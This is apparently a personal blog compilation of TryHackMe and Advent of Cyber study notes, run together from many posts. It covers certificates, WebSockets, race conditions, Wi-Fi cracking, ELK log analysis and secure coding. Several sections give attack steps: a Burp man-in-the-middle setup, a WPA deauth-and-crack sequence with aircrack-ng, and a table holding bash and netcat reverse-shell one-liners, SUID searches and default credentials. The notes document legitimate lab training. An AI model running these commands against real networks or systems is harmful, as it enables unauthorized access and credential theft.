AI old sAInt nickSplunk Did you SIEM?Phishing Merry ClickmasLinux CLI Shells BellsCertificate mismanagement Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas!Parts of a certificate:
Breakdown of what happens with a certificate:
Browsers typically don’t trust self-signed certificates because there is no third-party verification. Just because you say you’re ths entity doesn’t mean you are. Being too trusting leads to man-in-the-middle attacks. Trusted CA certificates are verified by a CA that acts as a trusted third party to confirm an entity is who they say they are.
Resolve the target website to self in order to prevent DNS logs from alerting others. echo "<ip-address> <web-address.tld>" >> /etc/hosts. Can confirm with cat /etc/hosts. Next, use Burp to set self up as the man-in-the-middle (mitm). Proxy > Intercept off > Proxy Settings. Add new listener for our IP address. Set to port 8080 and toggle on Specific address to specify own address. Burp comes with its own self-signed certificate, and since users were already used to clicking advanced and accept, it won’t phase them with this new cert.
Reroute all traffic to own machine by adding resolution for website to own IP, setting self up as gateway (full attack is more in depth, just out of scope for this task).
(Dummy mode for this task involves running a script to simulate interactions with the website. If in the wild, it’s not necessary.)
Go to HTTP History section of Burp to see intercepted requests.
Use the mitm attack to sniff out admin creds and find flags along the way.
Burp Suite module.
WebSockets It came without buffering! It came without lag!WebSockets let your browser and the server keep a contanst line of communication open. Great for things like live chat apps, real-time games, and live data feeds. Since there is no need for extra requests once the line is opened, there’s less overhead and faster communications.
Since WebSockets stay open and active, they can be taken advantage of if proper security measures aren’t in place. Common vulnerabilities to be aware of:
When an attacker intercepts and changes the messages sent between browser and server. if for a transaction, they could bypass security checks, send unauthorized requests, or alter important data like usernames, payment amounts, or access levels, possibly rerouting payments to a different account. Since the WebSockets connection is open in reaal-time, all changes are immediate. Messages could also be changes to grant admin rights or insert malicious commands to take over the server.
Since WebSockets don’t have the same security protections as traditional HTTP connections, devs need to add vigorous checks like message validation or encryption. The impact of changin messages depends on how the app uses the data and what kind of data it is. Four possible outcomes include:
Turn on FoxyProxy and open Burp Suite to Proxy > Intercept > Proxy settings > WebSocket interception rules. In this instance, enable intercepting both directions. Use the intercept to track different cars and inject messages for other people.
Burp Suite module.
Web timing attacks If I can’t steal their money, I’ll steal their joy!Type of vulnerability isn’t about sending bad data, it’s about how the data is sent. Simplest form, web timing attack means gleaning information from a web application by reviewing how long it takes to process our data. By making tiny changes in what is sent or how it’s sent and observing the response time, we can access information we’re not authorized to. Race conditions are a subset of web timing attacks where you can cause the web application to do unintended actions on our behalf. Time differences from 1300ms to 5ns have been used for attacks. They can be hard to detect, but HTTP/2 has made it a bit easier to find and exploit them.
HTTP/2 supports feature called single-packet multi-requests. With single-packet single-request, couldn’t tell if delays were from processing or network latency. Stacking multiple requests in the same TCP packet with single-packet multi-request eliminates network latency from the equation. All that remains is server latency.
Two main categories:
Time-of-Check to Time-of-Use (TOCTOU) flaw.Need to be able to intercept traffic, so using Burp Suite and the Burp browser. Intercepting POST request for transfer and sending to repeater. From Repeater window, after clicking on the request, use CTRL+R to copy the tab 10 times. Click plus sign to create a tab group. Click down caret at Send botton and select Send group in parallel (last-byte sync), then send the request.
Since this flaw was caused by python code running the transaction and the balance check separately, there are a few recommended fixes.
Grab the flag from one of the transactions performed.
Race Conditions room.
Wi-Fi attacks If you’d like to WPA, press the star key!For educational purposes only:
Basic steps:
The handshake doesn’t directly reveal the PSK, but involves encrypted messages that can only be understood with the same PSK.
Anyone can “hear” this conversation happening, and can use it as the basis to attempt offline brute-forcing or dictionary attacks. This involves trying different possible passwords and comparing the results to the captured handshake until the same result is achieved.
In terminal:
iw dev to show any wireless devices available, and their configuration.sudo iw dev wlan2 scan to use wlan2 to scan for available networks.
BSS(ID) can help identify the maker of the device, and SSID idicates it is sdvertising a network, so it is an AP of some sort.RSN (Robust Security Network) is part of WPA2 standard, so network is using WPA2. This typically defines the encryption and authentication settings.Group and Pairwise ciphers are CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), the encryption method used by WPA2.Authentication suites is PSK, indicating it is WPA2-Personal with a shared password for authentication.DS Paarameter set is channel 6, showing it it 2.4GHz network.Monitor mode on the wireless device allows it to listen to all traffic on a specific channel, whether directed at the device or not. Captures all traffic within range for analysis without ever joining network. To set device in monitoring mode:
sudo ip link set dev wlan2 down to turn off device.sudo iw dev wlan2 set type monitor to set device to monitor mode.sudo ip link set dev wlan2 up to turn device on.Using 2 terminals to observe capture and issue commands:
sudo airodump-ng wlan2 to start capturing traffic, specially targeting handshake packets (note: by default airodump-ng automatically switches the device into monitor mode if it’s available).sudo airodump-ng -c 6 --bssid <MAC-address> -w output-file wlan2 to target a specific channel and MAC address, and save the captures to a few files that start with “output-file”.
STATION shows the BSSID of the connected device.sudo aireplay-ng -0 1 -a <AP-MAC-address> -c <Station-MAC-address> wlan2 to start deauth attack.-0 to specify deauth attack, 1 to specify sending 1 deauth.-a BSSID of AP.-c BSSID of the client to deauth.
Success is shown when WPA handshake shows in top right corner. Can then move on to cracking the PSK by using aircrack-ng:sudo aircrack-ng -a 2 -b <AP-MAC-address> -w </path/to/wordlist.txt> output*cap where:
-a 2 indicates WPA/WPA2 attack mode.-b indicates AP MAC address.-w indicates the dictionary list to use.output*cap name of the output files to run the attack against.
Once PSK is cracked, can use it to join the network, after turning off airodump-ng. Can’t join a network if the device is in monitor mode. Can join the wireless network with:
:~$ wpa_passphrase <SSID> '<PSK-HERE>' > config
:~$ sudo wpa_supplicant -B -c config -i wlan2
Retrieve SSID, BSSID, and PSK info.
Networking module
Phishing He had a brain full of macros, and had shells in his soul.GRC Nine o’clock, make GRC fun, tell no one.Shellcodes Shellcodes of the world, unite!AWS log analysis Oh, no. I’M SPEAKING IN CLOUDTRAIL!Sandboxes If you can’t find a nice malware to use, I’m not going.XXE SOC-mas XX-what-ee?Atomic Red Team I’m all atomic inside!There will be gaps in your defenses, but they don’t have to be huge, they can be minimized. Two main reasons for Detection gaps:
All cyber attacks follow fairly standard process refered to as Unified Cyber Kill chain:
Initial Recon > Initial Compromise > Establish Foothold > Escalate Privileges > either Internal Recon or GOTO 80 > Move Laterally > Maintain Presence > Escalate Privileges > Complete Mission (80)
Blue team dream to detect and prevent all attacks at step 1, but unpractical. Need to try to detect at each step so any one miss along the chain isn’t disasterous. Real goal is to detect before the last phase of goal execution. MITRE ATT&CK framework is collection of tactics, techniques, and procedures (TTPs) seen to be implemented in the wild. Has navigator tool to investigate TTPs. All information is theoretical. Atomic Red Team library is collection of test cases mapped to MITRE Att&CK framework.
Drop atomics in powershell by using invoke-atomictest. Parameters:
| Parameter | Explanation | Example |
|---|---|---|
| -AtomicTechnique | Defines technique to emulate. Can use complete name or “TXXXX” value. Can be omitted. | invoke-atomictest -atomictechnique T1566.001 |
| -ShowDetails | Shows details of each test in the Atomic. | invoke-atomictest T1566.001 -showdetails |
| -ShowDetailsBrief | Shows the title of each test in the Atomic. | invoke-atomictest T1566.001 -showdetailsbrief |
| -CheckPrereqs | Checks if all necessary components are present for testing. | invoke-atomictest T1566.001 -checkprereqs |
| -TestNames | Sets tests to execute using Atomic Test name. | invoke-atomictest T1566.001 -testnames “Download Macri-Enabled Phishing Attachment” |
| -TestGuids | Sets test to be executed using test id. | invoke-atomictest T1566.001 -testguids 114ccff9-ae6d-4547-9ead-4cd69f687306 |
| -TestNumbers | Sets test to be executed using test number. Limited to the Atomic Technique. | invoke-atomictest T1566.001 -testnumbers 2,3 |
| -Cleanup | Run the cleanup commands configured to revert machine to normal. | invoke-atomictest T1566.001 -testnumbers 2 -cleanup |
Can use Windows Event Logs/Sysmon to find actions that take place during testing.
Detecting the Atomic doesn’t matter if you don’t do anything about it. Can create custom alerting rules once we know what artefacts were created during attack. Look for things that don’t often run from scripts in the background, i.e. Invoke-WebRequest.
Identify the atomic test that will take advantage of a command and scripting interpreter, conduct the test, extract artefacts, and grab the flag.
Atomic Red Team room.
Log analysis Even if I wanted to go, their vulnerabilities wouldn’t allow it.Log analysis is crucial to blue-team work.
ELK combines data analytics and processing tools to make log analysis manageable. Forms dedicated stack to aggregate logs from multiple sources into central place. Today starts with Kibana Discover interface.
| Query/Syntax | Description | Example |
|---|---|---|
| ” “ | Search for specific values. Exact search. | “TryHackMe” |
| ** | Wildcard for similar matches to value provided | United** (returns United Kingdom and United States) |
| OR | Shows documents that contain either value provided | “United Kingdom” OR “England” |
| AND | Shows documents that contain both values provided | “Ben” AND “25” |
| : | Search a specific field in the document. Field availability depends on fields available in document. | ip.address: 10.10.10.10 |
Can filter out noise by selecting/unselecting certain fields. Adding fields just applies correct KQL syntax through GUI. Can also filter specific values in fields by clicking field in left pane and adding/removing with +/-. Can click and drag on timeline to select time covered in search.
Without the website confirming things like file type, size, file contents it can open door for attacks on webserver.
One of the easiest paths of attack is weak or default creds. Common weak.default creds attacker might try:
| Username | Password |
|---|---|
| admin | admin |
| administrator | administrator |
| admin@domainname | admin |
| guest | guest |
Post vulnerability exploitation commands to try:
| Command | Use |
|---|---|
| ls | Gives idea of files and directories around you |
| cat | Outputs contents of documents like text files |
| pwd | Gives idea of where in system you are |
| whoami | Lets you know who you are |
| hostname | System name and potentially its role |
| uname -a | System info like OS, kernel version, etc. |
| id | Shows any groups current user is assigned to |
| ifconfig | Network setup info |
| bash -i >& /dev/tcp/<your-ip>/<port> 0>&1 | Begins reverse shell via bash |
| nc -e /bin/sh <your-ip> <port> | Begin reverse shell via Netcat |
| find / -perm -4000 -type f 2>/dev/null | Finds SUID files, useful for privesc |
| find / -writable -type f 2>/dev/null | grep -v “/proc/” | Find files with writable permissions |
Investigate attack in Kibana to answer blues questions, then recreate attack to answer red questions. Had to watch the end of the video to get my shell going.
Advanced ELK queries room(?).
Log analysis One man’s false positive is another man’s potpurri.Because of reasons and obligations I’m already 4 days behind and AoC just started. Here we go…
Detection Engineering rules defined in SIEM to identify malicious or suspicous activity from event logs. Analysis of SIEM events tke place in SOC. SOC has superpower of calling users or processing change requests to confirm user actions to eliminate false positives.
Kryptonite to SOC superpower:
Context of user, department, tools, etc. helps analyst make right judgement. Networking team may use Wireshark (doodoo doodoo doo) but use of it by HR or Finance would be out of place.
Correlate past and future events to create timeline to tell story of what is happening. Important to note artifacts important enough to connect dots; IPs, machine names, user names, hashes, file paths, etc. Always ensure evidence supports hypothoses.
Hamburger menu > Discover > set date/time range. Add columns from field on left. Best practice to have named accounts to do any admin activity so there is accountability and attribution for each activity performed. Seeing generic service admin accounts should raise suspicion. Note: Powershell uses Base64. Encoded commands can thus be decoded through Cyber Chef.
Answer questions based on info from elastic and Cyber Chef.
Investigating with ELK 101 room.
OPSEC Maybe SOC-mas music, he thought, doesn’t come from a store?SQL injection Inject the Halls with EXEC QueriesMalware analysis She sells C# shells by the C2shoreDisk forensics Have a Holly, Jolly Byte!Log analysis ‘Tis the season for log choppingMemory corruption Memories of Christmas PastReverse engineering A Christmas DOScovery: Tapes of Yule-tide PastBrute-forcing Baby, it’s CeWLd outsideBrute-forcing Hydra is Coming to TownLog analysis O Data, All Ye FaithfulMachine learning Chatbot, tell me, if you’re really safeOWASP Open Web Application Security Project
Practical application through an example attack.
Target module’s Sub-tabs:
Took advantage of some simple one to keep the streak going but keep working on other things. They were mostly explanitory setup items. Today’s task doesn’t take any action to answer the questions, but might have a couple noteworthy items.
Burp Proxy open a web interface at 127.0.0.1:8080 (by defualt). Either need to alter bowser settings to use proxy, or use Firefox extension FoxyProxy. Allows saving proxy profiles so switching between Burp and regular use is simple.
Day 53 and I’m still saying “I’m not a robot” in a Frank Drebin voice. Today I’m sticking to one task, Introduction to the Burp Proxy.
Still no archive. Possibly farther from having an archive. And still only in the introductory tasks of the Burp room.
The two tasks I think I’m going to stick to are on Installation and The Dashboard, so there may not be many notes.
Last night I finished off “HTTP in detail”. There was a cool little emulator to create HTTP requests and see the code sent, then the response contained the flag for that particular question. Today starts Burp.
Cookies are saved when you recieve a “Set-Cookie” header from a web server. Every subsequent request to the server, the cookie gets sent along with. HTTP is stateless, so cookies can remind the server who you are, what personal settings for the website may be set, or whether you have visited the website before. Sample exchange:
```http
GET / HTTP/1.1
Host: cookies.thm
User-Agent: xxxx
I’m now at over 40 posts and the streak is at 46. Not a bad difference considering some of the days I had trying to keep the streak alive but not enough time to write about it. The home page is getting kind of long, so in addition to the archive I’m trying to get working, I think I need to also incorporate a paginate, although the newest gem for Jekyll apparently doesn’t work with GitHub Pages. I’ll have to add that to the list of things to get sorted. Now as Zaphod and Ford say - to business.
Status codes inform client of the outcome of its request and potentially how to handle it. Can be broken into 5 different ranges:
Since I’m trying to get an archives section going and cut down the clutter on the homepage I’m only doing one task and it’s a short one.
HTTP is the set of rules used for communicating with webservers for transmitting webpage data, whether it’s HTML, images, videos, etc.
While HTML provides structure and content, JavaScript controls functionality. JS allows dynamic pages, like changing the styl of a button when a particular event happends on the page. JS is added within the page source code and can be loaded within <`script`> tags or referenced with the src attribute, <`script src="/location/of/javascript_file.js"><``/script>.
New room in the path, “How Websites Work”. Also, day 41 of the streak.
MySQL typically not the first point of call in a network, definitely unlikely as a path in a CTF. For purposes of this lesson, credentials were found while enumerating subdomains of a web server but they didn’t match up to an SSH user, so trying them with MySQL. If trying to use non-Metasploit tools:
https://nmap.org/nsedoc/scripts/mysql-enum.html
https://www.exploit-db.com/exploits/23081
Relational database management system (RDbMS) based on Structured Query Language (SQL).
This is leveraging SMTP information to gain SSH access to the system. The previous enumeration revealed an open SSH port, a username, and the type of SMTP server and OS running.
Email requires protocol pair, SMTP and POP/IMAP. SMTP server performs three basic functions:
First tool needed on a local machine to do more advanced enumeration is nfs-common package (Linux?). Important to have on any machine that uses NFS, as client or server. Includes lockd, ststd, showmount, nfsstat, gssd, idmapd, and mount.nfs. Primary concern for enumerating purposes is showmount and mount.nfs because they’re most useful for extracting information from the NFS share.
NFS - Network File System allows sharing directories and files with others over a network. Allows access almost as if local files by mounting all or a portion of a file system on a server. User priviledges can be assigned. Further nitty gritty reading: https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html
FTP session operates using two channels, command/control and data. The command channel is used for commands and replies, while the data channel transfers data. Functions as a client-server protocol. Comes in Active and Passive connections.
Same process as with SMB, start with a port scan.
Made it to 31 days in the streak, but this will be a short one.
Vulns like CVE-2017-7494 can allow RCE, but more likely to come across misconfigurations that allow access. One common misconfig allows gaining information that in turns allows shell access.
AoC is over once again. Prizes were not won, but at least fun was had, several new things were learned, and the dust was shaken off a few older things. I took a super easy question yesterday to keep the streak alive, and now I need to figure out where to go. Now that I’m a subscriber, I can go further in a learning path than I have before. The problem is I dodn’t remember what I started. I thought I hit the paywall and had pivoted to another learning path, but I’m not entirely sure now. At the moment, I’m on the comlete beginner path getting into the Network Services Room. I guess I’ll finish that and see where I end up.
Defense in Depth Mission ELFPossible: Abominable for a DayOne to go…
Attack Surface Reduction Threats are failing all around meTwo to go…
MQTT Have yourself a merry little webcamFormal definition of IoT may change depending on who is setting it, but can be best used as a broad categorization of “a device that sends and receives data to communicate with other devices and systems.” IoT categorizes unique devices, i.e. smart fridges, that dont match other categories, such as mobile devices. Tend to be lightweight, only essential functionality and features included. Of the modern features that may be left out or overlooked is security.
Firmware Binwalkin’ around the Christmas treeFocusing on firmware reverse engineering from a security standpoint. It’s possible a smart watch could have firmware programmed to send all incoming messages, emails, etc. to a specific IP unbeknownst to the user. Steps to follow:
Hardware Hacking Wiggles go brrToo many things going on and had to skip a couple days, but kept the streak going at least through answering some random simple questions. Now I have three days worth of AoC to catch up on though.
Sigma Lumberjack Lenny Learns New RulesThreat detection involves proactively prusuing and analysing abnormal activity within an ecosystem to identify malicious signs of compromise or intrusion within a network.
Secure Coding Filtering for Order Among ChaosValidating input is the castle wall of your web aap castle. Merits the same amount of hardening as their medieval counterparts. A generally effective way of validating input is first to know how a specifi piece of data is going to be processed by the rest of the app. Then go through syntax and semantic validation checks to ensure user-provided values in syntax and logical value. Then comes filtering with very specific rules as to what forms will accept and imeediately strip or drop ones that don’t fit the predefined category.
Secure Coding SQLi’s the king, the carolers singSQL is traditional language used to query DBs. Any app that relies on a DB needs to create SQL sentences on the fly to retrieve information. SQL syntax supposed to resemble straightforward English sentences.
Secure Coding Santa is looking for a SidekickAnother security concern for web apps is insufficient input validation. Occurs when user-provided input is inherently trusted by the application. I think I know where this is going. SQL Injection, Cross Site Scripting, and Unrestricted File Upload stem from this issue. UFU can allow an attakcer to host and/or serve illegal content or leak sensitive information. Usually has two main paths:
Web Applications I’m dreaming of secure web appsCan’t talk webapps without talking databases. Two popular database models:
Packet Analysis Simply having a wonderful pcap timeRan out of time to do a separate task and post yesterday. Only had enough time to finish off Task 17 from Monday.
Malware Analysis Forensic McBlue to the REVscueMalware has typical patterns allowing easier identification and providing insight for defenses.
Memory Forensics Not all gifts are niceNote: Two days later I realized I forgot to rename this and the next posts in the front-end. Fitting for a memory-centric task.
Hack a Game You’re a mean one, Mr. YetiI think I tripped over a rock and died.
Pivoting Dock the hallsCommon way to tell if a compromised application is running in a docker container is checking if root dir has /.dockerenv.
Smart Contracts Last Christmas I gave you my ETHFirst, before anything else, based on the title there is no way I’m watching the walkthrough video lest I be suckered into losing Whamageddon. Sneaky tip to MWRSecurity, if you don’t already have Wham’s Last Christmas playing quietly in the background, you should reshoot the video with it on a loop.
CyberChef Maldocs roasting on an open fireHad to skip yesterday’s challenge and post, so they’re doubled today. I kept a simple question in the wings to keep the streak alive though. Glad for this one because I’m always looking for a fun reason to use CyberChef.
Email Analysis It’s beginning to look a lot like phishingTwo main concerns in email analysis:
Brute-Forcing He knows when you’re awakeScanning Scanning through the snowTwo types of scanning based on intrusiveness of info gathering:
OSINT Nothing escapes detective McRedOSINT - gathering and analysing publicly available data for intel purposes. Sources include internet, mass media, specialist journals and research, photos, and geospatial information. Accessed via open internet (indexed by search engines), closed forums (not indexed by search engines), deep and dark web.
Log Analysis Santa’s Naughty & Nice LogWindows logs available through Event Viewer.
Frameworks Someone’s coming to town!Frameworks is referring to security frameworks, in this case namely NIST Cybersecurity Framework, ISO 27000 series of standards, MITRE ATT&CK framework, the Cyber Kill Chain, and the Unified Kill Chain.
I started trying to get this site up and running after last year’s AoC event. I had a good streak going, was learning all sorts of stuff, and wanted to keep better track of it than random notes and pages in various notebooks. Unfortunately I could never get it up and running, then I lost my streak and my desire. With AoC kicking off again in a few hours I wanted to try and get it running again.